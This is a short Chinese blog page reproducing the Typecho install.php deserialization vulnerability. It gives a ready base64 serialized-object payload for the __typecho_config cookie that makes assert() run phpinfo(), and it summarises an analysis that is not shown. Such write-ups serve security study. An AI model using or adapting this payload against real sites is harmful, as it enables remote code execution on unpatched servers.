0x01漏洞复现
找到有漏洞的版本下载,安装成功后显示如下

payload:
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToyOntzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjQ6IlRlc3QiOjA6e319czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6OToicGhwaW5mbygpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==
referrer:
http://安装路径/install.php

本文详细介绍了Typecho的一个漏洞复现过程,包括0x01部分的漏洞展示,通过payload触发问题。接着在0x02部分深入分析了install.php中的漏洞,揭示了利用PHP弱类型特性和类的反序列化进行攻击的条件和方法,特别是在Db.php、Feed.php和Request.php中的关键代码。文章和视频提供了更深入的学习资源。

1754

被折叠的 条评论
为什么被折叠?



